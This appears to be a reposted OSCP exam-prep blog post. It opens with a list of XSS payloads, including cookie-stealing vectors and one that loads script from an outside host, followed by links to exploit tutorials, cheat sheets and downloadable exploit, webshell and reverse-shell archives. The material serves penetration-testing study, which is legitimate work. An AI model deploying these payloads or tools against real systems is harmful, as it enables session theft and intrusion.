  1147. <IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041>
  1148. <IMG SRC=”jav ascript:alert(‘XSS’);”>
  1149.  
  1150.  
  1151.  
  1152. perl -e ‘print “<IMG SRC=javascript:alert(\”XSS\”)>”;’ > out
  1153.  
  1154.  
  1155.  
  1156. <BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
  1157.  
  1158.  
  1159.  
  1160. ( “>< iframes http://google.de < iframes >)
  1161.  
  1162.  
  1163.  
  1164. <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  1165. <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
  1166.  
  1167. “><script >alert(document.cookie)</script>
  1168. %253cscript%253ealert(document.cookie)%253c/script%253e
  1169.  
  1170. “><s”%2b”cript>alert(document.cookie)</script>
  1171. %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
  1172.  
  1173. <img src=asdf onerror=alert(document.cookie)>
  1174.  
  1175.  
  1176.  
  1177.  
  1178.  
  1179.  
  1180.  
  1181.  
  1182.  
  1183. Useful Links To Read and Learn:
  1184. Enumeration:
  1185.  
  1186. http://www.0daysecurity.com/penetration-testing/enumeration.html
  1187.  
  1188.  
  1189.  
  1190. Windows Shellcode:
  1191.  
  1192. http://farlight.org/index.html?type=shellcode
  1193.  
  1194. http://shell-storm.org/shellcode/
  1195.  
  1196. http://www.windowsexploits.com/
  1197.  
  1198.  
  1199.  
  1200.  
  1201.  
  1202. XSS Cheat Codes:
  1203.  
  1204. http://www.xenuser.org/xss-cheat-sheet/
  1205.  
  1206. https://gist.github.com/sseffa/11031135
  1207.  
  1208. https://html5sec.org/
  1209.  
  1210.  
  1211.  
  1212.  
  1213.  
  1214.  
  1215.  
  1216. Reverse Shell Cheat Codes:
  1217.  
  1218. http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
  1219.  
  1220. http://roo7break.co.uk/?p=215
  1221.  
  1222.  
  1223.  
  1224.  
  1225.  
  1226. Webshells:
  1227.  
  1228. http://www.r57shell.net/
  1229.  
  1230.  
  1231.  
  1232.  
  1233.  
  1234. Nikto Tutorial:
  1235.  
  1236. http://www.unixmen.com/install-nikto-web-scanner-check-vulnerabilities/
  1237.  
  1238.  
  1239.  
  1240.  
  1241.  
  1242. Exploit-db:
  1243.  
  1244. wget http://exploit-db.com/archive.tar.bz2
  1245.  
  1246.  
  1247.  
  1248.  
  1249.  
  1250. SNMP Enumeration:
  1251.  
  1252. http://www.webpronews.com/snmp-enumeration-and-hacking-2003-09
  1253.  
  1254. http://carnal0wnage.attackresearch.com/2007/07/over-in-lso-chat-we-were-talking-about.html
  1255.  
  1256.  
  1257.  
  1258.  
  1259.  
  1260. SAMBA Enumeration:
  1261.  
  1262. http://www.iodigitalsec.com/windows-null-session-enumeration/
  1263.  
  1264. http://pen-testing.sans.org/blog/2013/07/24/plundering-windows-account-info-via-authenticated-smb-sessions
  1265.  
  1266. http://carnal0wnage.attackresearch.com/2007/07/enumerating-user-accounts-on-linux-and.html
  1267.  
  1268. http://www.madirish.net/59
  1269.  
  1270.  
  1271.  
  1272.  
  1273.  
  1274. Passhing The Hash:
  1275.  
  1276. https://www.kali.org/penetration-testing/passing-hash-remote-desktop/
  1277.  
  1278. https://www.kali.org/kali-monday/pass-the-hash-toolkit-winexe-updates/
  1279.  
  1280.  
  1281.  
  1282. Hashcat Tutorial:
  1283.  
  1284. http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-3-using-hashcat-0156543/
  1285.  
  1286.  
  1287.  
  1288.  
  1289.  
  1290. Wordlist Download:
  1291.  
  1292. https://wiki.skullsecurity.org/Passwords
  1293.  
  1294. http://hqsoftwarecollection.blogspot.in/p/36gn-wordlist.html
  1295.  
  1296.  
  1297.  
  1298.  
  1299.  
  1300. NASM Tutorial:
  1301.  
  1302. http://en.kioskea.net/faq/1559-compiling-an-assembly-program-with-nasm
  1303.  
  1304.  
  1305.  
  1306.  
  1307.  
  1308.  
  1309.  
  1310. Buffer overflow Tutorial:
  1311.  
  1312.  
  1313.  
  1314. I consider this as intermediate and focus more on the real application exploit. Lupin from The Grey Corner explains exploit from basic to intermediate level with step by step debugging.
  1315.  
  1316.  
  1317.  
  1318. Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/beginning-stack-based-buffer-overflow.html
  1319.  
  1320.  
  1321.  
  1322. SEH Stack Based Windows Buffer Overflow Tutorial – http://grey-corner.blogspot.com/2010/01/seh-stack-based-windows-buffer-overflow.html
  1323.  
  1324.  
  1325.  
  1326. Windows Buffer Overflow Tutorial: Dealing with Character Translation – http://grey-corner.blogspot.com/2010/01/windows-buffer-overflow-tutorial.html
  1327.  
  1328.  
  1329.  
  1330. Heap Spray Exploit Tutorial: Internet Explorer Use After Free Aurora Vulnerability – http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html
  1331.  
  1332.  
  1333.  
  1334. Windows Buffer Overflow Tutorial: An Egghunter and a Conditional Jump – http://grey-corner.blogspot.com/2010/02/windows-buffer-overflow-tutorial.html
  1335.  
  1336.  
  1337.  
  1338.  
  1339.  
  1340. ADVANCED:
  1341.  
  1342.  
  1343.  
  1344. Peter Van Eeckhoutte is the first one who started this exploit tutorial (at least he is the first one who has provided most comprehensive guides on exploit development and keeps updating from time to time that I have ever seen).
  1345.  
  1346.  
  1347.  
  1348. Exploit writting tutorial part 1:Stack Based Overflows – http://www.corelan.be:8800/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  1349.  
  1350.  
  1351.  
  1352. Exploit writting tutorial part 2: Stack Based Overflows – jumping to shellcode – http://www.corelan.be:8800/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
  1353.  
  1354.  
  1355.  
  1356. Exploit writting tutorial part 3: SEH Based Exploits – http://www.corelan.be:8800/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
  1357.  
  1358.  
  1359.  
  1360. Exploit writting tutorial part 3b: SEH Based Exploits – just another example – http://www.corelan.be:8800/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
  1361.  
  1362.  
  1363.  
  1364. Exploit writting tutorial part 4: From Exploit to Metasploit – The basics – http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/
  1365.  
  1366.  
  1367.  
  1368. Exploit writting tutorial part 5: How debugger modules & plugins can speed up basic exploit development – http://www.corelan.be:8800/index.php/2009/09/05/exploit-writing-tutorial-part-5-how-debugger-modules-plugins-can-speed-up-basic-exploit-development/
  1369.  
  1370.  
  1371.  
  1372. Exploit writting tutorial part 6: Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR – http://www.corelan.be:8800/index.php/2009/09/21/exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/
  1373.  
  1374.  
  1375.  
  1376. Exploit writting tutorial part 7: Unicode – from 0x00410041 to calc – http://www.corelan.be:8800/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
  1377.  
  1378.  
  1379.  
  1380. Exploit writting tutorial part 8: Win32 Egg Hunting – http://www.corelan.be:8800/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
  1381.  
  1382.  
  1383.  
  1384. Exploit writting tutorial part 9: Introduction to Win32 shellcoding – http://www.corelan.be:8800/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/
  1385.  
  1386.  
  1387. SQL Injection Cheat Codes:
  1388.  
  1389. http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
  1390.  
  1391. http://resources.infosecinstitute.com/backdoor-sql-injection/
  1392.  
  1393.  
  1394.  
  1395.  
  1396.  
  1397. RFI/LFI Tutorials:
  1398.  
  1399. https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/
  1400.  
  1401. http://www.hackersonlineclub.com/lfi-rfi
  1402.  
  1403. https://0xzoidberg.wordpress.com/category/security/lfi-rfi/
  1404.  
  1405.  
  1406.  
  1407.  
  1408.  
  1409. NMAP Vulsan:
  1410.  
  1411. http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz
  1412.  
  1413.  
  1414.  
  1415. Online Hash Cracking:
  1416.  
  1417. http://www.objectif-securite.ch/
  1418.  
  1419.  
  1420.  
  1421.  
  1422.  
  1423. Dump Windows Password Hashes:
  1424.  
  1425. http://bernardodamele.blogspot.com/2011/12/dump-windows-password-hashes.html
  1426.  
  1427.  
  1428.  
  1429.  
  1430.  
  1431.  
  1432.  
  1433. Windows Previlige Escalation:
  1434.  
  1435. http://it-ovid.blogspot.in/2012/02/windows-privilege-escalation.html
  1436. http://www.fuzzysecurity.com/tutorials/16.html
  1437.  
  1438.  
  1439.  
  1440.  
  1441.  
  1442. Linux Previlige Escalation:
  1443.  
  1444. http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
  1445. http://pentestmonkey.net/tools/audit/unix-privesc-check
  1446. http://www.rebootuser.com/?p=1758
  1447.  
  1448.  
  1449.  
  1450. Tunneling & Port Forwarding:
  1451.  
  1452. http://magikh0e.ihtb.org/pubPapers/ssh_gymnastics_tunneling.html (Very Good)
  1453. http://www.debianadmin.com/howto-use-ssh-local-and-remote-port-forwarding.html
  1454. http://www.danscourses.com/Network-Penetration-Testing/metasploit-pivoting.html
  1455. http://carnal0wnage.attackresearch.com/2007/09/using-metasploit-to-pivot-through_06.html
  1456. http://www.offensive-security.com/metasploit-unleashed/Portfwd
  1457. http://www.offensive-security.com/metasploit-unleashed/Pivoting
  1458. http://www.howtoforge.com/reverse-ssh-tunneling
  1459. http://ftp.acc.umu.se/pub/putty/putty-0.57/htmldoc/Chapter7.html (Plink)
  1460. http://www.offensive-security.com/metasploit-unleashed/Msfvenom
  1461.  
  1462.  
  1463.  
  1464.  
  1465.  
  1466.  
  1467.  
  1468. Useful Links:
  1469.  
  1470. http://www.fuzzysecurity.com/tutorials.html – Exploit tutorials
  1471. https://www.corelan.be/index.php/articles/ – Exploit tutorials
  1472. http://www.securitytube.net/ – Training videos
  1473. http://www.offensive-security.com/blog/ – Offensive Security blog
  1474. http://blog.g0tmi1k.com/ – Security blog
  1475. http://carnal0wnage.attackresearch.com
  1476. http://cybershakti.my3gb.com/
  1477. http://www.offensive-security.com/metasploit-unleashed/Introduction
  1478. http://www.securityfocus.com/
  1479. http://www.exploit-db.com/
  1480. http://nmap.org/nsedoc/
  1481. http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
  1482. http://www.fuzzysecurity.com/tutorials/16.html
  1483. http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html
  1484. http://incolumitas.com/wp-content/uploads/2012/12/blackhats_view.pdf
  1485. http://pentestmonkey.net/tools/audit/unix-privesc-check
  1486. http://pentestmonkey.net/tools/windows-privesc-check
  1487.  
  1488.  
  1489.  
  1490.  
  1491.  
  1492.  
  1493.  
  1494. Videos:
  1495.  
  1496. http://www.securitytube.net/
  1497. http://www.rmccurdy.com/scripts/videos/ (milliworm exploit tutorial)
  1498. http://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html (Offensive Secuirty Lectures)
  1499.  
  1500.  
  1501.  
  1502.  
  1503.  
  1504. Privilege Escalation in Windows:
  1505.  
  1506. http://www.youtube.com/watch?v=kMG8IsCohHA Encyclopaedia Of Windows Privilege Escalation – Brett Moore
  1507. http://www.youtube.com/watch?v=_8xJaaQlpBo DerbyCon 3 0 2105 Windows Attacks At Is The New Black Rob Fuller And Chris Gates
  1508. http://www.greyhathacker.net/?p=738 Elevating privileges by exploiting weak folder permissions
  1509.  
  1510.  
  1511.  
  1512.  
  1513.  
  1514. Buffer Overflow Tutorial:
  1515.  
  1516. http://www.frequency.com/video/athcon-hack-in-paris-demo-1/40181156
  1517. http://www.savevid.com/video/athcon-hack-in-paris-demo-2.html
  1518. http://www.frequency.com/video/athcon-hack-in-paris-demo-3/11306148
  1519.  
  1520.  
  1521.  
  1522.  
  1523.  
  1524. https://www.youtube.com/watch?v=ANlROJNWtCs&list=PLM0IiVYClP2vC3A6Uz_ESV86kBVYei5qx (Python Penetration Testing)
  1525.  
  1526. https://www.youtube.com/watch?v=Sye3mu-EoTI (Bash Scripting by Peter Chubb)
  1527.  
  1528. https://www.youtube.com/watch?v=GPjcSxyIIUc (BASH Scripting by Lee Baird )
  1529.  
  1530. https://www.youtube.com/watch?v=kPxavpgos2I (LFI/RFI)
  1531.  
  1532. https://www.youtube.com/watch?v=pnqcHU2qFiA (LFI/RFI)
  1533.  
  1534. http://www.securitytube.net/video/7640 (Simple buffer overflow)
  1535.  
  1536. https://www.youtube.com/watch?v=y2zrEAwmdws (Mona.py)
  1537.  
  1538. http://www.securitytube.net/video/7735 (Avoiding bad characters)
  1539. PDF:
  1540.  
  1541. https://www.yumpu.com/en/document/view/14963680/from-sqli-to-shell (SQL Injection)
  1542.  
  1543. https://cyberwar.nl/d/hak5.org_LinuxUnixBSDPost-ExploitationCommandList_copy-20130228.pdf (Linux Unix Post Exploitation Command)
  1544.  
  1545. http://www.scribd.com/doc/245679444/hak5-org-OSXPost-Exploitation-copy-20130228-pdf#scribd (Post Exploitation Command List)
  1546.  
  1547. http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf (Netcat)
  1548.  
  1549. http://download.vulnhub.com/pentesterlab/php_include_and_post_exploitation.pdf (PHP Include and Post Exploitation)
  1550.  
  1551.  
  1552.  
  1553.  
  1554.  
  1555. Best Book I refer:
  1556.  
  1557. http://www.amazon.com/Penetration-Testing-Hands-On-Introduction-Hacking/dp/1593275641
  1558.  
  1559.  
  1560.  
  1561. Windows compiled Exploit Reference:
  1562.  
  1563.  
  1564.  
  1565. Those who have not enough lab time to compile their windows exploit, I will recommend you to download and compile the Mike Czumak Windows pre-compiled reference chart. I compiled it using Visual Studio and GNU Code-blocks, really it will very useful at the time of exam.
  1566.  
  1567. I uploaded those pre-compiled exploits in mediafire with password protected, but i discourage that becoz exploit compilation is one of the exercise in the course so you have to do it your own. if anyone need that mail me at sathisharthar@gmail.com (Note: don’t try to bruteforce it, its more than 20 words)
  1568.  
  1569.  
  1570.  
  1571. http://www.securitysift.com/download/MS_privesc_and_exploits_table.csv
  1572.  
  1573.  
  1574.  
  1575.  
  1576.  
  1577.  
  1578.  
  1579. Windows Tools, Scripts and Pre-Compiled Exploit for Remote and Priviledge Escalation:
  1580.  
  1581.  
  1582.  
  1583. http://download1582.mediafire.com/atk42ybutgcg/wqnw5c3ljgudqiv/windows.zip
  1584.  
  1585.  
  1586.  
  1587. I added some tools and script in that for windows machines.
  1588.  
  1589.  
  1590.  
  1591. Screenshot from 2015-01-27 19:11:47
  1592.  
  1593.  
  1594.  
  1595. Screenshot from 2015-01-27 19:12:22
  1596.  
  1597.  
  1598.  
  1599. Screenshot from 2015-01-27 19:12:51
  1600.  
  1601.  
  1602.  
  1603. Screenshot from 2015-01-27 19:13:47
  1604.  
  1605.  
  1606.  
  1607.  
  1608.  
  1609. Linux Precompiled Exploits for Local Root Exploit:
  1610.  
  1611.  
  1612.  
  1613. http://www.mediafire.com/download/os1i1ble6b0sm8g/linux.zip
  1614.  
  1615.  
  1616.  
  1617. Screenshot from 2015-01-27 19:15:08
  1618.  
  1619.  
  1620.  
  1621. Screenshot from 2015-01-27 19:15:30
  1622.  
  1623.  
  1624.  
  1625.  
  1626.  
  1627.  
  1628.  
  1629. Some Usefull PenTesting scripts:
  1630.  
  1631.  
  1632.  
  1633. http://www.mediafire.com/download/j4qz4y41qfrjo9m/script.zip
  1634.  
  1635.  
  1636.  
  1637. Screenshot from 2015-01-27 19:16:00
  1638.  
  1639.  
  1640.  
  1641.  
  1642.  
  1643.  
  1644.  
  1645. Usefull Network Service Scanning Scripts:
  1646.  
  1647.  
  1648.  
  1649. http://www.mediafire.com/download/03xld2cb755jd4p/scanner.zip
  1650.  
  1651.  
  1652.  
  1653. Screenshot from 2015-01-27 19:15:45
  1654.  
  1655.  
  1656.  
  1657.  
  1658.  
  1659. Usefull Wordlist For Bruteforce:
  1660.  
  1661.  
  1662.  
  1663. http://www.mediafire.com/download/sv4hs7p67924yk9/wordlists.zip
  1664.  
  1665.  
  1666.  
  1667.  
  1668.  
  1669. Usefull Reverse Shell Payloads and Webshells:
  1670.  
  1671.  
  1672.  
  1673. http://www.mediafire.com/download/fs5pa4nq3nhi8ja/shell.zip
  1674.  
  1675. http://www.mediafire.com/download/p0f77dblr2yzeaa/webshells.zip
  1676.  
  1677.  
  1678.  
  1679. Screenshot from 2015-01-27 19:16:20
  1680.  
  1681.  
  1682.  
  1683.  
  1684.  
  1685. I Hopes, It will helpful for guys who doing OSCP Training and Exam. If any doubts related to the post ping me…
  1686. About these ads
  1687. Tags: (OSCP), offsec, oscp exam hints, oscp exam tips, oscp lab hints, oscp lab tips, oscp tips, OSCP Tips and Tricks, oscp tricks, Penetration Testing with Kali Linux, The Offensive Security Certified Professional
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement